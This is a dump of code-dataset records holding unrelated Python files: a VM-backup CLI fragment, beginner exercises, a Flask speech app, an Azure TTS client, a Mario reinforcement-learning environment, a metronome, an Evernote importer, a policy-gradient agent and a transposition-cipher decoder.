type=bool, nargs='?', const=True,\n help=\"full clean\")\n# set default func\nparser_clean_backup.set_defaults(func=cleanBackupParser)\n\n# -------------------- add cleanBackup cmd ----------------------------------\nparser_clean_remote_backup = subparsers.add_parser(\"cleanRemoteBackup\", help=\"cleanRemoteBackup help\")\nparser_clean_remote_backup.add_argument(\"--domain\", required=True, metavar=\"[DOMAIN]\", type=str,\n help=\"vm domain to export\")\nparser_clean_remote_backup.add_argument(\"--pool\", required=False, metavar=\"[POOL]\", type=str,\n help=\"vm pool to backup\")\nparser_clean_remote_backup.add_argument(\"--vol\", required=False, metavar=\"[VOL]\", type=str,\n help=\"vm disk to backup\")\nparser_clean_remote_backup.add_argument(\"--version\", required=False, metavar=\"[VERSION]\", type=str,\n help=\"backup version id\")\nparser_clean_remote_backup.add_argument(\"--all\", required=False, metavar=\"[ALL]\", type=bool, nargs='?', const=True,\n help=\"full clean\")\nparser_clean_remote_backup.add_argument(\"--remote\", required=True, metavar=\"[REMOTE]\", type=str,\n help=\"remote server host.\")\nparser_clean_remote_backup.add_argument(\"--port\", required=True, metavar=\"[PORT]\", type=str,\n help=\"remote server port.\")\nparser_clean_remote_backup.add_argument(\"--username\", required=True, metavar=\"[USERNAME]\", type=str,\n help=\"remote server username.\")\nparser_clean_remote_backup.add_argument(\"--password\", required=True, metavar=\"[PASSWORD]\", type=str,\n help=\"remote server password.\")\n# set default func\nparser_clean_remote_backup.set_defaults(func=cleanRemoteBackupParser)\n\n# -------------------- add scanBackup cmd ----------------------------------\nparser_scan_backup = 
subparsers.add_parser(\"scanBackup\", help=\"scanBackup help\")\nparser_scan_backup.add_argument(\"--domain\", required=True, metavar=\"[DOMAIN]\", type=str,\n help=\"vm domain to export\")\nparser_scan_backup.add_argument(\"--vol\", required=False, metavar=\"[VOL]\", type=str,\n help=\"vm disk to backup\")\nparser_scan_backup.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"backup to store\")\n# set default func\nparser_scan_backup.set_defaults(func=scanBackupParser)\n\n# -------------------- add deleteRemoteBackupServer cmd ----------------------------------\nparser_delete_remote_backup_server = subparsers.add_parser(\"deleteRemoteBackupServer\",\n help=\"deleteRemoteBackupServer help\")\nparser_delete_remote_backup_server.add_argument(\"--remote\", required=True, metavar=\"[REMOTE]\", type=str,\n help=\"remote server host.\")\nparser_delete_remote_backup_server.add_argument(\"--port\", required=True, metavar=\"[PORT]\", type=str,\n help=\"remote server port.\")\nparser_delete_remote_backup_server.add_argument(\"--username\", required=True, metavar=\"[USERNAME]\", type=str,\n help=\"remote server username.\")\nparser_delete_remote_backup_server.add_argument(\"--password\", required=True, metavar=\"[PASSWORD]\", type=str,\n help=\"remote server password.\")\nparser_delete_remote_backup_server.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"storage pool to use\")\n# set default func\nparser_delete_remote_backup_server.set_defaults(func=deleteRemoteBackupServerParser)\n\n# https://stackoverflow.com/questions/48648036/python-argparse-args-has-no-attribute-func\ntry:\n os.putenv('LANG', 'en_US.UTF-8')\n args = parser.parse_args()\n args.func(args)\nexcept TypeError:\n # print\"argument number not enough\"\n logger.debug(traceback.format_exc())\n\n","sub_path":"kubesds-adm.py","file_name":"kubesds-adm.py","file_ext":"py","file_size_in_byte":54614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"186642450","text":"class Car():\n def __init__(self):\n self.Name = \"\"\n self.Price = 0\n def setCar(self, name, price):\n self.Name = name\n self.Price = price\n\nnames = [\"car1\", \"car2\", \"car3\"]\nprices = [100, 10, 1]\ncars = []\n\nfor i in range(len(names)):\n car = Car()\n car.setCar(names[i], prices[i])\n cars.append(car)\n\nprint(len(cars))\n\nfor c in cars:\n print(c.Name, c.Price)","sub_path":"array/CarList.py","file_name":"CarList.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"151517321","text":"from flask import Flask, request, url_for, render_template\nimport speech_recognition as sr\n\napp = Flask(__name__)\nr = sr.Recognizer() \n\n@app.route('/')\ndef index():\n return render_template(\"index.html\")\n\n@app.route('/result', methods=['GET','POST'])\ndef uploader():\n if request.method == 'POST':\n f = request.files['mp3file']\n with sr.AudioFile(f) as source:\n audio = r.record(source) \n text = r.recognize_google(audio,language=\"my-MM\")\n return render_template(\"result.html\",audio=text )\n\nif __name__== '_main_':\n app.run()","sub_path":"app/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"472260620","text":"import requests\nimport os\nfrom os import environ\nfrom os.path import isdir\nfrom os import mkdir\nimport enum\nimport 
time\nfrom random import choice\nfrom baseClasses import genders , Countries, fileName\n\n\nvoices = {\n Countries.Australian : {\n genders.female : [\"en-AU-NatashaNeural\"],\n genders.male : [\"en-AU-WilliamNeural\"]\n },\n Countries.Indian : {\n genders.male :[\"en-IN-PrabhatNeural\"],\n genders.female:[\"en-IN-NeerjaNeural\"]\n },\n Countries.British : {\n genders.male: [\"en-GB-RyanNeural\"],\n genders.female : [\"en-GB-MiaNeural\",\"en-GB-LibbyNeural\"]\n },\n Countries.Irish : {\n genders.male : [\"en-IE-ConnorNeural\"],\n genders.female : [\"en-IE-EmilyNeural\"]\n },\n Countries.South_Africa : {\n genders.male : [\"en-ZA-LukeNeural\"],\n genders.female : [\"en-ZA-LeahNeural\"]\n },\n Countries.American : {\n genders.male : [\"en-US-GuyNeural\"],\n genders.female : [\"en-US-JennyNeural\",\"en-US-AriaNeural\"]\n },\n Countries.Canada : {\n genders.male : [\"en-CA-LiamNeural\"],\n genders.female : [\"en-CA-ClaraNeural\"]\n },\n #Countries.HongKong : { #To be kicked out , just clones of other voices\n # genders.male : [\"en-HK-SamNeural\"],\n # genders.female : [\"en-HK-YanNeural\"]\n # },\n Countries.Philippines : {\n genders.male : [\"en-PH-JamesNeural\"],\n genders.female : [\"en-PH-RosaNeural\"]\n },\n #Countries.Singapore : { #To be kicked out , just clones of other voices\n # genders.female : [\"en-SG-LunaNeural\"],\n # genders.male : [\"en-SG-WayneNeural\"]\n # }\n }\n\nssml_string =\"\"\"\n\n %s\n\n\"\"\"\n\nclass TextToSpeech(object):\n def __init__(self):\n self.subscription_key = environ[\"API_KEY\"]\n self.tts = None\n self.timestr = time.strftime(\"%Y%m%d-%H%M\")\n self.access_token = None\n self.get_token()\n\n '''\n The TTS endpoint requires an access token. This method exchanges your\n subscription key for an access token that is valid for ten minutes.\n '''\n def get_token(self):\n fetch_token_url = \"https://eastus.api.cognitive.microsoft.com/sts/v1.0/issueToken\"\n headers = {\n 'Ocp-Apim-Subscription-Key': self.subscription_key\n }\n response = requests.post(fetch_token_url, headers=headers)\n self.access_token = str(response.text)\n\n def synthesizeVoice(self,words:str,voice:str) -> bool :\n #time.sleep(1)\n #print(list(voices[country].keys()))\n #voice = choice(list(voices[country][gender]))\n i=2\n while i>=0 :\n body:str = ssml_string%(voice,words)\n\n base_url = 'https://eastus.tts.speech.microsoft.com/'\n path = 'cognitiveservices/v1'\n constructed_url = base_url + path\n headers = {\n 'Authorization': 'Bearer ' + self.access_token,\n 'Content-Type': 'application/ssml+xml',\n 'X-Microsoft-OutputFormat': 'riff-24khz-16bit-mono-pcm',\n 'User-Agent': 'HotwordGenerators'\n }\n\n response = requests.post(constructed_url, headers=headers, data=body)\n '''\n If a success response is returned, then the binary audio is written\n to file in your working directory. 
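As printed above, `ssml_string` has lost its XML markup: only one `%s` survives, yet `synthesizeVoice` formats it with two values, `(voice, words)`. A plausible skeleton in the shape Azure's v1 speech endpoint expects, with both placeholders restored (the exact attributes are an assumption, not recovered from the dump):

# Two '%s' slots: the first names the neural voice, the second carries the text.
ssml_string = """<speak version='1.0' xml:lang='en-US'>
<voice xml:lang='en-US' name='%s'>
    %s
</voice></speak>"""

body = ssml_string % ('en-PH-JamesNeural', 'Hello world')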
It is prefaced by sample and\n includes the date.\n '''\n if response.status_code == 200:\n filePath = fileName%(words,voice,\"AZURE\")\n with open(filePath+\".wav\", 'wb') as audio:\n audio.write(response.content)\n print(\"\\nStatus code: \" + str(response.status_code) + \"\\nYour TTS is ready for playback.\\n\")\n return\n else:\n if(response.status_code==429): #401\n print(\"+++++++++++++++++++++\")\n print(\"Hit the limit, starting delay of 15 sec\")\n print(\"+++++++++++++++++++++\")\n time.sleep(15)\n elif(response.status_code==401):\n print(\"#-#-#-#-#-#-#-#-#-#-#-\")\n print(\"Unauthourized!!, starting delay of 200 sec\")\n print(\"#-#-#-#-#-#-#-#-#-#-#-\")\n self.get_token()\n time.sleep(10)\n i-=1\n else:\n print(\"Some other error bitch\")\n i-=1\n print(\"\\nStatus code: \" + str(response.status_code) + \"\\nSomething went wrong. Check your subscription key and headers.\\n\")\n print(\"Reason: \" + str(response.reason) + \"\\n\")\n\n\nTTS_Engine:TextToSpeech = TextToSpeech()\n#TTS_Engine.synthesizeVoice(\"Hello world\",Countries.Indian)\n\ndef getAudioSample(word:str,voice:str):\n if(not os.path.isdir(f\"dataset/{word}\")):\n os.mkdir(f\"dataset/{word}\")\n TTS_Engine.synthesizeVoice(word,voice)\n\n\"\"\"\nfor country in voices.keys():\n synthesizeVoice(\"I am angelina jolie\",str(country)+\"_female.wav\",country,genders.female)\n synthesizeVoice(\"I am John Walker\",str(country)+\"_male.wav\",country,genders.male)\n\"\"\"\nif __name__==\"__main__\":\n getAudioSample(\"bread\",\"en-PH-JamesNeural\")","sub_path":"azure_tts.py","file_name":"azure_tts.py","file_ext":"py","file_size_in_byte":5503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"299598149","text":"\ndef squared(x):\n # local variable inside of the function\n # when inside a function you USUALLY cannot change global variables\n localvar = x*x\n return localvar\n\nglobalvar = 7\nthreeSquare = squared(3)\n\nprint(\"Num is \" + str(num))\nprint(\"threeSquare is \" + str(threeSquare))\n\n\n\n\n\n\n","sub_path":"Canfly/Lessons/8 Functions 2/Scope.py","file_name":"Scope.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"503502358","text":"# Ternary If Statements\n\na = 1\nb = 2\n\n\"bigger\" if a > b else \"smaller\"\n\nstudent_names = [\"Mark\", \"Danny\", \"Sue\"]\n\n# For loop\n\nfor name in student_names:\n print(\"student name is {0}\".format(name))\n\n\nfor index in range(10): # rang() function converts it into a list [0 - 9]\n x += 10\n print(\"The valuse of X is {0}\".format(x))\n\n# Break and continue\n\nfor name in student_names:\n if name == \"Bort\":\n # break\n continue\n print(\"Found him! 
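The Scope.py record above ends by printing `num`, a name it never defines (its globals are `globalvar` and `threeSquare`), so it raises NameError when run. The same lesson with the prints pointed at names that actually exist:

def squared(x):
    # localvar exists only inside this call frame; it is not visible outside.
    localvar = x * x
    return localvar

globalvar = 7
threeSquare = squared(3)

print("globalvar is " + str(globalvar))
print("threeSquare is " + str(threeSquare))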
\" + name)\n print(\"student name is {0}\".format(name))\n\n# While loop\n\nx = 0\nwhile x < 10:\n print(\"Count is {0}\".format(x))\n x += 1\n","sub_path":"pluralsight-python-getting-started/l3_01_if_loops_break_continue.py","file_name":"l3_01_if_loops_break_continue.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"41404948","text":"import argparse\n\nfrom detectron2.checkpoint import DetectionCheckpointer\nfrom detectron2.config import get_cfg\n\nfrom trainer import Trainer\nfrom trainer import setup\n\nap = argparse.ArgumentParser()\nap.add_argument('config_file')\nargs = ap.parse_args()\n\n\n# cfg = get_cfg()\n# cfg.merge_from_file(args.config_file)\ncfg = setup(args, freeze=False)\n\n# cfg.MODEL.WEIGHTS='weights/coco_personkp/model_final_a6e10b.pkl'\n# cfg.MODEL.WEIGHTS = 'weights/coco_personkp/model_final_a6e10b_anchor-removed.pkl'\ncfg.MODEL.WEIGHTS = 'weights/mask_deform/model_final_821d0b.pkl'\ncfg.MODEL.LOAD_PROPOSALS = False\ncfg.DATASETS.TRAIN = ()\ncfg.freeze()\n\nmodel = Trainer.build_model(cfg)\nprint(cfg.MODEL.WEIGHTS)\nDetectionCheckpointer(model).resume_or_load(cfg.MODEL.WEIGHTS)\n\npthfile = cfg.MODEL.WEIGHTS\nimport pickle\nwith open(pthfile, \"rb\") as f:\n data = pickle.load(f, encoding=\"latin1\")\n","sub_path":"try_load.py","file_name":"try_load.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"160454794","text":"import gym\nimport numpy as np\nfrom gym import spaces\n\nimport pygame\nfrom MarioGame.classes.Dashboard import Dashboard\nfrom MarioGame.classes.Level import Level\nfrom MarioGame.classes.Menu import Menu\nfrom MarioGame.classes.Sound import Sound\nfrom MarioGame.entities.Mario import Mario\nfrom MarioGame.main import windowSize\nfrom MarioGame.openCV import ImgExtract\nimport cv2\n\nfrom MarioGame.abs_filepath import ABS_PATH\n\n\nbutton_log = [\"left\", \"right\", \"up\", \"dash\"]\n\nclass BasicEnv(gym.Env):\n \"\"\"Custom environment Basic code\"\"\"\n metadata = {\"render.modes\": [\"human\"]}\n\n def __init__(self):\n super(BasicEnv, self).__init__()\n\n # 보상값을 설정함\n self.reward_range = (0, 1)\n # env.reward_range. 했을 때 출력하는 결과. reward를 조정함에 있어 이것도 변경해주는것이 좋음\n\n # 움직일 수 있는 방향을 의미함\n # https://github.com/LuterGS/OSSP1_RL/blob/Pygame/classes/Input.py 의 방향을 참고함.\n self.action_space = spaces.MultiDiscrete([1, 1, 1])\n # 각각 좌,우 / 점프 / 가속을 의미함\n\n # 볼 수 있는 환경을 의미함\n self.observation_space = spaces.Box(low=0, high=1, shape=(480, 640, ), dtype=np.float)\n # 최대/최소값이 1/0으로 정규화된 3차원 numpy array를 입력으로 받음, 현재 row, col은 123인데, 게임 보고 변경해야할듯\n\n # Mario Game import\n\n def reset(self):\n\n pygame.mixer.pre_init(44100, -16, 2, 4096)\n pygame.init()\n self.screen = pygame.display.set_mode(windowSize)\n self.max_frame_rate = 30\n self.dashboard = Dashboard(ABS_PATH + \"img/font.png\", 8, self.screen)\n self.sound = Sound()\n self.level = Level(self.screen, self.sound, self.dashboard)\n self.menu = Menu(self.screen, self.dashboard, self.level, self.sound)\n\n # 메뉴에서 게임 들어갈 때까지 메뉴 업데이트\n ctr = 0\n for i in range(2000):\n self.menu.update()\n # while not self.menu.start:\n # ctr += 1\n # self.menu.update()\n # print(ctr)\n\n # 1. 메뉴에서 게임 플레이로 들어감\n self.menu.key_input_status[4] = True\n self.menu.update()\n\n # random map 들어가는 부분\n # self.menu.key_input_status[3] = True\n # self.menu.update()\n\n self.menu.key_input_status[4] = True\n self.menu.update()\n\n # 2. 
게임 플레이에서 레벨 선택\n # self.menu.key_input_status[5] = True\n # self.menu.update()\n\n self.mario = Mario(0, 0, self.level, self.screen, self.dashboard, self.sound)\n # mario.input.CUR_BUTTON_PRESSED 이런식으로 접근해야하는데...\n self.clock = pygame.time.Clock()\n\n # 게임은 프레임 단위로 나눔\n # 일단 1초간 기다리자.\n for i in range(self.max_frame_rate):\n if self.mario.pause:\n self.mario.pauseObj.update()\n else:\n self.level.drawLevel(self.mario.camera)\n self.dashboard.update()\n self.mario.update()\n pygame.display.update()\n self.clock.tick(self.max_frame_rate)\n\n # 그 이후에 observation을 받아오고\n observation = ImgExtract.Capture(self.screen, cv2.COLOR_BGR2GRAY)\n # print(observation)\n print(\"reset complete!\")\n\n # return 해줄 것.\n return observation\n\n def step(self, action):\n # agent의 action 결과를 받는다.\n # Multi-Discrete 환경이라서 어떻게 받는지는 모르겠지만, 일단 4개 numpy array를 받는다고 가정하자.\n # print(\"Action : \", action)\n button_pressed = [\n True if action[0] < 0 else False,\n True if action[0] >= 0 else False,\n False if action[1] < 0 else True,\n False if action[2] < 0 else True\n ]\n # print(action)\n # print(\"button : \", end=\" \")\n # for i in range(4):\n # if button_pressed[i]:\n # print(button_log[i] + \", \", end=\" \")\n # print(\"pressed\\n\")\n\n\n # action을 토대로 game에 입력을 줌 (30FPS 기준으로 이 입력이 0.2초동안, 즉 6프레임만큼 유지된다고 가정하자\n # -> 추후 변경 가능\n self.mario.input.CUR_BUTTON_PRESSED = button_pressed\n\n # 입력을 기반으로 게임 진행\n for i in range(6):\n if self.mario.pause:\n self.mario.pauseObj.update()\n else:\n self.level.drawLevel(self.mario.camera)\n self.dashboard.update()\n self.mario.update()\n pygame.display.update()\n self.clock.tick(self.max_frame_rate)\n\n # 이후에 observation을 받아옴\n observation = ImgExtract.Capture(self.screen, cv2.COLOR_BGR2GRAY)\n reward = -0.01 # 추후에 이미지 토대로 calculation 가능\n done = False\n\n # done check\n if self.mario.restart:\n print(\"restart requsted, reset in progress...\")\n done = True\n\n # return\n return observation, reward, done, None\n\n # self.game.getInput(action)\n\n # 이후 observation을 받음\n # observation = self.game.get_image()\n # done = self.game.is_finished()\n\n # 받은 observation을 토대로 reward 측정\n # reward = self.reward_calculation(observation)\n\n # 결과값 return\n # return observation, reward, done, {\"pressed\":, action}\n\n def reward(self, observation):\n reward = 0\n # 상의된 방식에 따라 observation에서 값을 뽑아내고, return.\n\n return reward\n\n def render(self, mode='human'):\n # 사람이 볼 수 있게끔 에이전트를 visualize 하는 부분\n # 필요 없을듯.\n pass\n\n def close(self):\n pass\n","sub_path":"RL/Environment/BasicGymEnv.py","file_name":"BasicGymEnv.py","file_ext":"py","file_size_in_byte":5954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"446647724","text":"#####################################################################\n#\n# metro.py\n#\n# Copyright (c) 2016, Eran Egozy\n#\n# Released under the MIT License (http://opensource.org/licenses/MIT)\n#\n#####################################################################\n\nfrom common.clock import kTicksPerQuarter, quantize_tick_up\n\nclass Metronome(object):\n \"\"\"Plays a steady click every beat.\n \"\"\"\n def __init__(self, sched, synth, channel = 0, patch=(128, 0), pitch = 60):\n super(Metronome, self).__init__()\n self.sched = sched\n self.synth = synth\n self.channel = channel\n self.patch = patch\n self.pitch = pitch\n self.beat_len = kTicksPerQuarter\n\n # run-time variables\n self.on_cmd = None\n self.off_cmd = None\n self.playing = False\n\n def start(self):\n if self.playing:\n return\n\n self.playing 
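BasicEnv implements the standard gym interface, so it can be exercised with the usual reset/step loop. A minimal driver sketch (the random 3-component action matches the comparisons in `step`; the step cap is arbitrary):

import numpy as np

# from RL.Environment.BasicGymEnv import BasicEnv  # path as in the record above

def run_episode(env, max_steps=200):
    obs = env.reset()
    total = 0.0
    for _ in range(max_steps):
        # Random policy placeholder: step() thresholds each component at 0.
        action = np.random.uniform(-1.0, 1.0, size=3)
        obs, reward, done, _ = env.step(action)
        total += reward
        if done:
            break
    env.close()
    return total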
= True\n\n # set up the correct sound (program change)\n self.synth.program(self.channel, self.patch[0], self.patch[1])\n\n # find the tick of the next beat, and make it \"beat aligned\"\n now = self.sched.get_tick()\n next_beat = quantize_tick_up(now, self.beat_len)\n\n # now, post the _noteon function (and remember this command)\n self.on_cmd = self.sched.post_at_tick(next_beat, self._noteon)\n\n def stop(self):\n if not self.playing:\n return \n \n self.playing = False\n\n # in case there is a note on hanging, turn it off immediately\n if self.off_cmd:\n self.off_cmd.execute()\n\n # cancel anything pending in the future.\n self.sched.remove(self.on_cmd)\n self.sched.remove(self.off_cmd)\n\n # reset these so we don't have a reference to old commands.\n self.on_cmd = None\n self.off_cmd = None\n\n def toggle(self):\n if self.playing:\n self.stop()\n else:\n self.start()\n\n def _noteon(self, tick, ignore):\n # play the note right now:\n self.synth.noteon(self.channel, self.pitch, 100)\n\n # post the note off for half a beat later:\n self.off_cmd = self.sched.post_at_tick(tick + self.beat_len/2, self._noteoff, self.pitch)\n\n # schedule the next noteon for one beat later\n next_beat = tick + self.beat_len\n self.on_cmd = self.sched.post_at_tick(next_beat, self._noteon)\n\n def _noteoff(self, tick, pitch):\n # just turn off the currently sounding note.\n self.synth.noteoff(self.channel, pitch)\n","sub_path":"common/metro.py","file_name":"metro.py","file_ext":"py","file_size_in_byte":2528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"351863637","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-i686/egg/donno/evernote.py\n# Compiled at: 2014-03-12 22:32:45\nimport os, sys, time\nfrom datetime import datetime\nfrom datetime import timedelta\nfrom xml.etree import ElementTree as ET\nimport nltk, settings\n\ndef convert_time(src):\n normal_time = datetime.strptime(src, '%Y%m%dT%H%M%SZ')\n local_time = normal_time + timedelta(hours=8)\n return local_time\n\n\ndef convert_created_time(src):\n local_cre_time = convert_time(src)\n created = local_cre_time.strftime('%Y-%m-%d %H:%M:%S')\n created_file = local_cre_time.strftime('%y%m%d%H%M%S')\n return {'filename': created_file + '.mkd', 'content': created}\n\n\ndef convert_modified_time(src):\n local_mod_time = convert_time(src)\n return time.mktime(local_mod_time.timetuple())\n\n\ndef convert_content(src):\n \"\"\"Did not treat the leading spaces problem. Fix it in vim manually\"\"\"\n intstr = src.replace('
', '\\n')\n intstr = intstr.replace('
', '\n')\n    intstr = nltk.clean_html(intstr)\n    intstr = intstr.replace('&quot;', '\"')\n    intstr = intstr.replace('&apos;', \"'\")\n    intstr = intstr.replace('&amp;', '&')\n    intstr = intstr.replace('&lt;', '<')\n    intstr = intstr.replace('&gt;', '>')\n    return intstr\n\n\ndef importnotes(source_file, dest_nb):\n    if not os.path.exists(source_file):\n        sys.exit('Source file does not exist')\n    if not settings.valid_nb(dest_nb):\n        sys.exit(settings.invalid_nb)\n    tree = ET.parse(source_file)\n    root = tree.getroot()\n    for note in root:\n        for t in note.iter('title'):\n            title = t.text\n\n        tags = []\n        for t in note.iter('tag'):\n            tags.append(t.text)\n\n        alltags = (';').join(tags)\n        for c in note.iter('content'):\n            raw = c.text\n\n        for c in note.iter('created'):\n            created = c.text\n\n        for u in note.iter('updated'):\n            updated = u.text\n\n        file_name = dest_nb + convert_created_time(created)['filename']\n        with open(settings.repo + file_name, 'w') as (f):\n            f.write('Title: ' + title.encode('utf8') + '\\n')\n            f.write('Tags: ' + alltags.encode('utf8') + '\\n')\n            f.write('Notebook: ' + dest_nb + '[t/j/o/y/c]\\n')\n            f.write('Created: ' + convert_created_time(created)['content'] + '\\n')\n            f.write('\\n------\\n\\n')\n            f.write(convert_content(raw).encode('utf8'))\n        last_modif = convert_modified_time(updated)\n        os.utime(settings.repo + file_name, (last_modif, last_modif))","sub_path":"pycfiles/donno-0.1.15-py2.7/evernote.py","file_name":"evernote.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"653139634","text":"import gym\nimport math\nimport numpy as np\nimport os\nimport os.path as osp\nfrom collections import deque\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nfrom tensorboardX import SummaryWriter\n\nfrom ReplayMemory import ExperienceReplayMemory\nfrom WrapPytorch import WrapPytorch\n\nclass Config(object):\n    GAMMA = 0.99\n    LR = 0.002\n    ENTROPY_BETA = 0.01\n    MAX_FRAMES = 1000000\n\n    device = (\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nclass PG_NN(nn.Module):\n    def __init__(self, input_shape, action_dim, action_lim):\n        '''\n        action_lim: (2,action_dim)\n        '''\n        super(PG_NN, self).__init__()\n        self.input_shape = input_shape\n        self.action_dim = action_dim\n        self.action_lim = action_lim\n        self.conv1 = nn.Conv2d(input_shape[0], 32, kernel_size=4, stride=2)\n        self.conv2 = nn.Conv2d(32, 64, kernel_size=3, stride=1)\n        self.nn = nn.Sequential(\n            nn.Linear(self.feature_size(), 64),\n            nn.ReLU(),\n            nn.Linear(64, action_dim),\n            nn.Sigmoid()\n        )\n\n    def forward(self, x):\n        if torch.cuda.is_available():\n            action_range = torch.tensor(self.action_lim[0]-self.action_lim[1], device=Config.device, dtype=torch.float).view(self.action_dim)\n            x = x.cuda()\n            x = self.conv2(self.conv1(x))\n            x = x.view(x.size(0), -1)\n            return self.nn(x.cuda())*action_range\n        x = x.float()\n        x = self.conv2(self.conv1(x))\n        x = x.view(x.size(0), -1)\n        x = self.nn(x.float())\n\n        return x\n\n    def feature_size(self):\n        return self.conv2(self.conv1(torch.zeros(1,*self.input_shape))).view(1,-1).size(1)\n\nclass PGAgent(object):\n    def __init__(self, env, log_dir='./pg/1'):\n        self.env = env\n        self.log_dir = log_dir\n        self.gamma = Config.GAMMA\n        self.lr = Config.LR\n        self.beta = Config.ENTROPY_BETA\n        self.baseline = deque(maxlen=100000)\n        self.device = Config.device\n\n        self.declare_memory()\n        self.declare_network()\n\n        self.writer = SummaryWriter(log_dir=self.log_dir)\n\n    def discounted_rewards(self, memories):\n        
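`discounted_rewards` above accumulates the return G_t = r_t + gamma * G_{t+1} by walking the stored transitions backwards and zeroing the accumulator at episode boundaries. A standalone version with a hand-checkable example:

import numpy as np

def discounted_returns(rewards, dones, gamma=0.99):
    # Walk backwards; a terminal flag cuts the running return between episodes.
    out = np.zeros(len(rewards))
    running = 0.0
    for t in reversed(range(len(rewards))):
        if dones[t]:
            running = 0.0
        running = running * gamma + rewards[t]
        out[t] = running
    return out

# With gamma = 0.5: G = [1 + 0.5*(1 + 0.5*1), 1 + 0.5*1, 1] = [1.75, 1.5, 1.0]
assert list(discounted_returns([1, 1, 1], [False, False, True], gamma=0.5)) == [1.75, 1.5, 1.0]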
disc_ret = np.zeros(len(memories))\n        run_add = 0\n        for t in reversed(range(len(memories))):\n            if memories[t][-1]==True:\n                run_add = 0\n            run_add = run_add * self.gamma + memories[t][2]\n            disc_ret[t] = run_add\n        return disc_ret\n    \n    def get_action(self, s):\n        if torch.cuda.is_available():\n            return self.model(s).detach().cpu().view(self.env.action_space.shape)\n        return self.model(s).cpu().view(self.env.action_space.shape)\n\n    def declare_network(self):\n        self.model = PG_NN(self.env.observation_space.shape, self.env.action_space.shape[0], [self.env.action_space.high,self.env.action_space.low])\n        self.optimizer = optim.Adam(self.model.parameters(), self.lr)\n\n    def declare_memory(self):\n        self.memory = []\n\n    def clear_memory(self):\n        self.memory = []\n\n    def store(self, s, a, r, s_, done):\n        self.memory.append((s,a,r,s_,done))\n    \n    def update(self):\n        loss = self.get_loss(self.memory)\n        self.writer.add_scalar(\"data/loss\", loss, it)\n        self.optimizer.zero_grad()\n        loss.backward()\n        self.optimizer.step()\n        self.clear_memory()\n\n    def get_loss(self, memory_vars):\n        disc_rew = self.discounted_rewards(memory_vars)\n        self.baseline.extend(disc_rew)\n        disc_rew -= np.mean(self.baseline)\n        acts = self.model(torch.tensor([e[0] for e in memory_vars]))\n        disc_rew_t = torch.tensor(disc_rew, dtype=torch.float, device=self.device)\n        log_softmax_t = torch.log(acts).view(-1,1)\n        loss = -torch.mean(log_softmax_t*disc_rew_t).squeeze()\n\n        return loss\n\n    def load(self, model_path):\n        # save() stores the whole model/optimizer objects, so load them back the same way\n        self.model = torch.load(osp.join(model_path, \"model\"))\n        self.optimizer = torch.load(osp.join(model_path, \"optim\"))\n\n    def save(self, model_path):\n        torch.save(self.model, osp.join(model_path,\"model\"))\n        torch.save(self.optimizer, osp.join(model_path,\"optim\"))\n\n\nif __name__ == \"__main__\":\n    env_id = \"CarRacing-v0\"\n    log_dir = \"./pg/1\"\n    if not osp.exists(log_dir):\n        os.makedirs(log_dir)\n    env = gym.make(env_id)\n    # env = gym.wrappers.Monitor(env, osp.join(log_dir))\n    env = WrapPytorch(env)\n\n    agent = PGAgent(env, log_dir)\n    obs = env.reset()\n    it = 0\n    for ep in range(Config.MAX_FRAMES):\n        # env.render()\n        action = agent.get_action(torch.tensor([obs], dtype=torch.float, device=agent.device)).detach().numpy()\n        print(action)\n        prev_obs = obs\n        obs, reward, done, _ = env.step(action)\n        agent.store(prev_obs, action, reward, obs, done)\n        if done:\n            agent.writer.add_scalar(\"data/reward\", reward, it)\n            it += 1\n            agent.update()\n            if it % 10 == 0:\n                agent.save(log_dir)\n            print(\"episode\", it, \"reward:\", reward)\n            obs = env.reset()\n\n    env.close()\n    agent.writer.close()\n","sub_path":"src/PG.py","file_name":"PG.py","file_ext":"py","file_size_in_byte":5167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"204354722","text":"import numpy as np\n\n\ndef dec(c, t):\n    \"\"\"\n    ---parameters---\n    c : cipher text\n    t : permutation rule\n    \"\"\"\n    t_inverse = np.argsort(t)\n    print(t_inverse)\n    split_number = len(t_inverse)\n    len_c = len(c)\n    split_c_by_len_t_inverse = [np.array(list(c[i:i+split_number])) for i in range(0, len_c, split_number)]\n    \n    plain_text = \"\"\n    for c_element in split_c_by_len_t_inverse[:-1]:\n        plain_text += \"\".join(c_element[t_inverse])\n\n    len_split_c_tail = len(split_c_by_len_t_inverse[-1])\n    print(len_split_c_tail)\n    if len_split_c_tail < split_number:\n        t_renew = np.argsort(np.array(list(filter(lambda x:x < len_split_c_tail, t))))\n        print(t_renew)\n        plain_text += \"\".join(split_c_by_len_t_inverse[-1][t_renew])\n    else:\n        # full-length tail: the original inverse permutation applies here\n        plain_text += \"\".join(split_c_by_len_t_inverse[-1][t_inverse])\n    \n    \n    print(plain_text)\n\n\n\n\n\ndef main():\n    print(\"---transposition 